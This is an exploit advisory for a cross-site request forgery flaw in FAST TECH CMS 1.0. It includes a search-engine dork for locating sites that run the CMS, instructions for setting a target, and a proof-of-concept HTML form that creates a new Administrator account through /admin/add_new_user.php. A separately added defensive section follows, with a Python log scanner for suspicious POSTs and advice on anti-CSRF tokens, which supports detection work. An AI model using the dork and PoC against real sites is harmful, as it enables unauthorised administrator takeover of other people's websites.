Authored by indoushka

FAST TECH CMS version 1.0 suffers from a cross-site request forgery vulnerability.

| # Title : FAST TECH CMS v1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 73.0.1 (32-bit) |
| # Vendor : |
| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |

poc :

[+] Dork in Google or another search engine.

[+] The following HTML code creates a new admin.

[+] Go to line 5.

[+] Set the target site link, save changes and apply.

[+] Affected file : /admin/add_new_user.php

[+] Save the code as poc.html.

<!DOCTYPE html>
<html xmlns="">
<head profile=""></head>
<body>
<form action="" method="post" name="newuserform" enctype="multipart/form-data">
<div class="form-group">
<input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required>
</div>
<div class="form-group">
<label>User Name</label>
<input type="text" class="form-control" id="username" name="username" placeholder="Enter User Name ..." required>
</div>
<div class="form-group">
<input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required>
</div>
<div class="form-group">
<label>Confirm Password</label>
<input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required>
</div>
<div class="form-group">
<label>User Type</label>
<select class="form-control" id="usertype" name="usertype" required>
<option>Select Type</option>
<option value="A">Administrator</option>
<option value="R">Retail</option>
</select>
</div>
<div class="form-group">
<input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required>
</div>
<div class="box-footer">
<button type="submit" class="btn btn-primary" name="submit">Submit</button>
</div>
</form>
</body>
</html>
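
For defenders checking whether this endpoint has been hit, the following added example (not part of the original advisory or the vendor's code) scans web-server access logs for POSTs to /admin/add_new_user.php whose Referer is missing or off-site. The combined log format, the host names cms.example and other.example, and the sample lines are assumptions constructed for illustration.

```python
import re

from urllib.parse import urlsplit

# Endpoint named in the advisory; log format and host names are assumptions.
TARGET_PATH = "/admin/add_new_user.php"

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def referer_host(referer):
    """Lower-cased host of a Referer value, or "" if absent or unparseable."""
    try:
        return (urlsplit(referer).hostname or "").lower()
    except ValueError:
        return ""

def find_suspect_posts(lines, site_hosts):
    """Return POSTs to TARGET_PATH whose Referer is missing or off-site."""
    allowed = {h.lower() for h in site_hosts}
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["url"].split("?", 1)[0] != TARGET_PATH:
            continue
        host = referer_host(m["referer"])
        if host in allowed:
            continue  # form was submitted from the site's own admin page
        hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                     "reason": "off-site referer" if host else "missing referer"})
    return hits

# Constructed sample lines (documentation IP ranges, example host names).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2020:10:01:00 +0000] "POST /admin/add_new_user.php HTTP/1.1" 200 512 "https://cms.example/admin/add_new_user.php" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2020:10:05:12 +0000] "POST /admin/add_new_user.php HTTP/1.1" 302 0 "https://other.example/poc.html" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2020:10:06:40 +0000] "POST /admin/add_new_user.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2020:10:07:02 +0000] "GET /admin/add_new_user.php HTTP/1.1" 200 4096 "https://other.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspect_posts(SAMPLE_LOG, {"cms.example"}):
        print(hit)
```

Browsers and privacy tools can strip the Referer header, so hits are triage leads to correlate with accounts created at the same time. The durable fix is a per-session anti-CSRF token checked by the form handler.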


Greetings to :
jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr